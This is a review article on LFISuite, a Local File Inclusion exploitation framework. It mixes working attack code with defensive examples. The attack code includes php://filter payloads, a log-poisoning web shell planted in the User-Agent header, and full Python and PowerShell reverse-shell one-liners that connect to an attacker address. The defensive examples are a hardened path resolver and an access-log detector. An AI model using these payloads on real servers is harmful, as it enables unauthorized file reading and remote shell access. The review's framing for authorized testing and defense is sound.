LFISuite: Anatomy of an Automated Local File Inclusion Exploitation Framework
Hook
Local File Inclusion vulnerabilities still appear in 1 out of every 17 web applications tested during penetration tests, yet most security teams manually test the same handful of payloads repeatedly. LFISuite automated this tedious process years ago—but its technical debt tells a cautionary tale about security tool maintenance.
Context
Local File Inclusion vulnerabilities emerge when web applications accept file paths as user input without proper sanitization, allowing attackers to read arbitrary files on the server filesystem. While conceptually simple, exploiting LFI effectively requires understanding multiple attack vectors: PHP wrappers (php://filter, php://input, expect://), log poisoning through access logs, /proc/self/environ manipulation, data URIs, and file descriptor exploitation. Each technique has specific prerequisites and failure modes.
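A defender's counterpart to the unsanitized path handling described above, added here as an example and not code from LFISuite or from any real application: a page-include resolver written the vulnerable way beside two hardened versions. The document root, page names and function names are hypothetical, and Python stands in for the PHP include() these attacks target; the checks themselves (allowlist first, path containment second, rejection of stream wrappers and null bytes) carry over directly.

```python
import posixpath
from typing import Optional

# Hypothetical application layout used only for this example.
DOC_ROOT = "/srv/app/pages"
ALLOWED_PAGES = {"home", "about", "contact"}


def resolve_page_unsafe(page: str) -> str:
    # Vulnerable pattern (the LFI sink): user input is joined straight into
    # the path, so "../../../etc/passwd" walks out of DOC_ROOT and a
    # "php://filter/..." value would reach PHP's stream layer unchanged.
    return posixpath.join(DOC_ROOT, page)


def resolve_page_allowlist(page: str) -> Optional[str]:
    # Preferred fix: the parameter selects one of a fixed set of names and is
    # never used as a filesystem path itself.
    if page not in ALLOWED_PAGES:
        return None
    return posixpath.join(DOC_ROOT, page + ".php")


def resolve_page_contained(page: str, root: str = DOC_ROOT) -> Optional[str]:
    # Fallback when an allowlist is impractical: reject wrappers and null
    # bytes up front, normalise the path, then require it to stay under root.
    if not page or "\x00" in page or "://" in page:
        return None
    first_segment = page.split("/", 1)[0]
    if ":" in first_segment:          # data:, phar:, expect: and similar schemes
        return None
    candidate = posixpath.normpath(posixpath.join(root, page))
    # commonpath compares whole components, not characters, so a sibling
    # directory such as "/srv/app/pages-old" does not pass for "/srv/app/pages".
    if posixpath.commonpath([root, candidate]) != root:
        return None
    # On a live system resolve symlinks (os.path.realpath) before this check so
    # that a link inside root cannot point back outside it.
    return candidate


if __name__ == "__main__":
    for probe in ("about.php", "../../../etc/passwd", "/proc/self/environ",
                  "php://filter/convert.base64-encode/resource=index.php"):
        print(f"{probe!r:60} unsafe={resolve_page_unsafe(probe)!r} "
              f"contained={resolve_page_contained(probe)!r}")
```

The allowlist version is the one to reach for in new code; the containment version exists for legacy applications where the parameter genuinely carries a relative file name, and it still refuses every wrapper, absolute path and traversal sequence listed in the Context section.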
Before tools like LFISuite, penetration testers manually crafted payloads for each vector, tracked which techniques worked against specific server configurations, and maintained separate scripts for post-exploitation tasks like spawning reverse shells. This fragmentation meant expertise remained siloed—you needed deep knowledge of PHP internals, Linux filesystem quirks, and web server configurations to exploit LFI vulnerabilities efficiently. LFISuite emerged as an attempt to codify this institutional knowledge into a single automated framework that could both discover and exploit LFI vulnerabilities through systematic enumeration of all known attack vectors.
Technical Insight
LFISuite's architecture centers on a modular attack dispatcher that sequentially attempts eight exploitation techniques, each implemented as a discrete function with its own payload generation and success validation logic. The tool's most sophisticated component is its Auto-Hack mode, which chains these techniques while maintaining state about successful exploitation vectors.
The tool's approach to PHP filter exploitation demonstrates its methodology. PHP's php://filter wrapper applies encoding conversions while a file is being read, so a PHP source file can be returned base64-encoded instead of executed, and the encoded output slips past basic filters that look for plain-text markers. LFISuite generates payloads like:
```python
import base64
import requests


def php_filter_attack(url, parameter, target_file):
    payloads = [
        'php://filter/convert.base64-encode/resource=' + target_file,
        'php://filter/read=string.rot13/resource=' + target_file,
        'php://filter/zlib.deflate/convert.base64-encode/resource=' + target_file
    ]
    for payload in payloads:
        vuln_url = url + '?' + parameter + '=' + payload
        response = requests.get(vuln_url)
        # is_base64_encoded() and contains_php_source() are validation helpers
        # defined elsewhere in the tool; they are not reproduced here.
        if is_base64_encoded(response.text):
            decoded = base64.b64decode(response.text)
            if contains_php_source(decoded):
                return {'success': True, 'method': 'php_filter',
                        'content': decoded, 'payload': payload}
    return {'success': False}
```
This pattern repeats across attack vectors—generate payloads, inject them via the vulnerable parameter, validate responses for exploitation indicators. The tool's validation logic looks for signatures like base64-encoded content, PHP source code patterns, or expected file content markers (like 'root:' from /etc/passwd).
The log poisoning attack vector showcases more sophisticated exploitation chains. LFISuite injects PHP code into server access logs through the User-Agent header, then uses the LFI vulnerability to include the log file, executing the injected code:
```python
import requests


def access_log_poisoning(url, parameter, log_paths):
    php_payload = '<?php system($_GET["cmd"]); ?>'
    headers = {'User-Agent': php_payload}
    # Poison the log: the server writes the User-Agent verbatim into its access log
    requests.get(url, headers=headers)
    # Common log locations for different servers
    for log_path in log_paths:
        test_url = url + '?' + parameter + '=' + log_path + '&cmd=id'
        response = requests.get(test_url)
        if 'uid=' in response.text and 'gid=' in response.text:
            return {'success': True, 'log_path': log_path,
                    'shell_url': url + '?' + parameter + '=' + log_path}
    return {'success': False}
```
The tool maintains hardcoded lists of common log locations (/var/log/apache2/access.log, /var/log/httpd/access_log, etc.) and systematically tests each one. This brute-force approach reflects the reality of penetration testing—you often don't know the target's exact configuration, so enumeration becomes essential.
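Both validation patterns above leave distinct traces in the web server's own access log: wrapper and traversal payloads in the request path, and a PHP open tag planted in the User-Agent followed by a request that includes the log file. The following is an added detection example, not LFISuite code: it parses combined-format log lines (the sample lines are constructed and use TEST-NET addresses), flags each indicator and links a planted PHP tag to a later log-file include from the same client. The signature names and helper functions are the example's own.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache/nginx "combined" log format (constructed example, not LFISuite code).
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Request-path indicators for the techniques the article describes. They are
# matched after URL decoding so %2e%2e and %252e%252e cannot hide a "../".
PATH_SIGNATURES = {
    "traversal": re.compile(r"\.\.[/\\]"),
    "php_wrapper": re.compile(r"\b(?:php|expect|data|zip|phar)://", re.I),
    "proc_environ": re.compile(r"/proc/self/environ", re.I),
    "log_include": re.compile(r"/var/log/(?:apache2|httpd|nginx)/", re.I),
    "sensitive_file": re.compile(r"/etc/(?:passwd|shadow)\b", re.I),
}
# A PHP open tag in a header the server logs is the first half of the
# log-poisoning chain; the include of the log file is the second half.
PHP_OPEN_TAG = re.compile(r"<\?(?:php\b|=)", re.I)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    m = COMBINED_LOG.match(line)
    return m.groupdict() if m else None


def decode_path(path: str) -> str:
    # Decode twice: LFI payloads are often double-encoded to defeat WAF rules.
    return unquote(unquote(path))


def classify(line: str) -> List[str]:
    """Return the LFI indicators present in one log line ([] if clean)."""
    rec = parse_line(line)
    if rec is None:
        return []
    target = decode_path(rec["path"])
    hits = [name for name, rx in PATH_SIGNATURES.items() if rx.search(target)]
    if PHP_OPEN_TAG.search(rec["ua"]) or PHP_OPEN_TAG.search(rec["referer"]):
        hits.append("log_poisoning_attempt")
    return hits


def scan(lines) -> Dict[str, List[str]]:
    """Aggregate indicators per client IP, dropping clients with none."""
    findings: Dict[str, List[str]] = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(line)
        if hits:
            findings.setdefault(rec["ip"], []).extend(hits)
    return findings


def poisoning_chains(lines) -> List[str]:
    """IPs that planted a PHP tag in a logged header and later included a log file."""
    planted = set()
    chained: List[str] = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(line)
        if "log_poisoning_attempt" in hits:
            planted.add(rec["ip"])
        if "log_include" in hits and rec["ip"] in planted and rec["ip"] not in chained:
            chained.append(rec["ip"])
    return chained


# Constructed sample log lines; the addresses are TEST-NET (RFC 5737) values.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Mar/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [03/Mar/2024:10:01:07 +0000] "GET /index.php?page=../../../etc/passwd HTTP/1.1" 200 2048 "-" "curl/8.4.0"',
    '203.0.113.9 - - [03/Mar/2024:10:01:09 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 4096 "-" "curl/8.4.0"',
    '203.0.113.9 - - [03/Mar/2024:10:01:12 +0000] "GET /index.php?page=home HTTP/1.1" 200 1532 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '203.0.113.9 - - [03/Mar/2024:10:01:15 +0000] "GET /index.php?page=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 8192 "-" "curl/8.4.0"',
    '203.0.113.22 - - [03/Mar/2024:10:02:00 +0000] "GET /index.php?page=%252e%252e/%252e%252e/%252e%252e/proc/self/environ HTTP/1.1" 404 210 "-" "python-requests/2.31"',
]

if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, sorted(set(hits)))
    print("log poisoning chains:", poisoning_chains(SAMPLE_LOG))
```

The per-line indicators are cheap enough to run as a streaming rule; the chain detection is what turns two individually low-severity events (an odd User-Agent, a request for a log path) into one high-confidence alert, which is exactly the sequence the tool's access_log_poisoning() function produces.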
LFISuite's reverse shell functionality integrates platform-specific payloads that exploit successful LFI vulnerabilities to establish persistent access. The tool generates Python, PHP, and bash one-liners tailored to the target operating system:
```python
def generate_reverse_shell(target_os, attacker_ip, port):
    if target_os == 'linux':
        return f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{attacker_ip}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
    elif target_os == 'windows':
        return f"powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient('{attacker_ip}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}}"
```
These payloads get injected through previously established exploitation vectors—typically via php://input, expect:// wrappers, or through poisoned log files that now execute arbitrary commands.
The Tor integration layer wraps all HTTP requests through SOCKS proxies, providing operational security for penetration testers:
```python
import requests


def configure_tor_proxy():
    # socks5h resolves hostnames through the proxy, so DNS lookups also go via Tor
    proxies = {
        'http': 'socks5h://127.0.0.1:9050',
        'https': 'socks5h://127.0.0.1:9050'
    }
    return proxies


def make_request(url, proxies=None):
    if proxies:
        return requests.get(url, proxies=proxies, timeout=10)
    return requests.get(url, timeout=10)
```
This design allows users to toggle anonymity on or off depending on engagement requirements. The tool checks for Tor service availability before enabling proxy routing, failing gracefully if Tor isn't running.
Gotcha
The Python 2.7 dependency represents LFISuite's fatal flaw. Python 2 reached end-of-life on January 1, 2020, meaning no security patches, no bug fixes, and incompatibility with modern operating systems that ship exclusively with Python 3. Running LFISuite requires maintaining a legacy Python 2.7 environment—feasible through pyenv or Docker containers, but introducing significant operational friction. More critically, Python 2.7's security vulnerabilities remain unpatched, creating an ironic situation where a security tool becomes a security liability.
The tool's requirement for root privileges during initial setup stems from its automatic dependency installation via pip. While convenient, this violates the principle of least privilege and creates risks if the tool's installation scripts are compromised. Modern security tools should use virtual environments and user-space package managers, not system-wide installations requiring elevated permissions. Additionally, several attack vectors assume specific server configurations (Apache log locations, proc filesystem availability, PHP configuration settings) that may not match modern containerized deployments or hardened server environments. The tool lacks fingerprinting capabilities to detect target configurations before attempting exploitation, leading to noisy, easily-detected attack patterns that trigger intrusion detection systems.
Verdict
Use if: You're conducting authorized penetration tests against legacy PHP applications running on traditional LAMP stacks, need to quickly enumerate multiple LFI attack vectors, and have Python 2.7 environments available. The tool excels at automating reconnaissance against older web applications where classic LFI techniques still apply. It's also valuable for security education—studying the source code reveals practical exploitation techniques more clearly than academic descriptions.
Skip if: You're testing modern web applications, working in Python 3-exclusive environments, need actively maintained security tools with current vulnerability databases, or require stealth during engagements. The Python 2.7 dependency alone should disqualify it for professional use. Instead, adopt Metasploit's LFI modules for enterprise engagements, use liffy for Python 3 environments, or investigate Kadimus for better performance and modern technique support. LFISuite serves as a historical artifact demonstrating why security tools require continuous maintenance—technical debt compounds faster in security contexts because the threat landscape evolves constantly.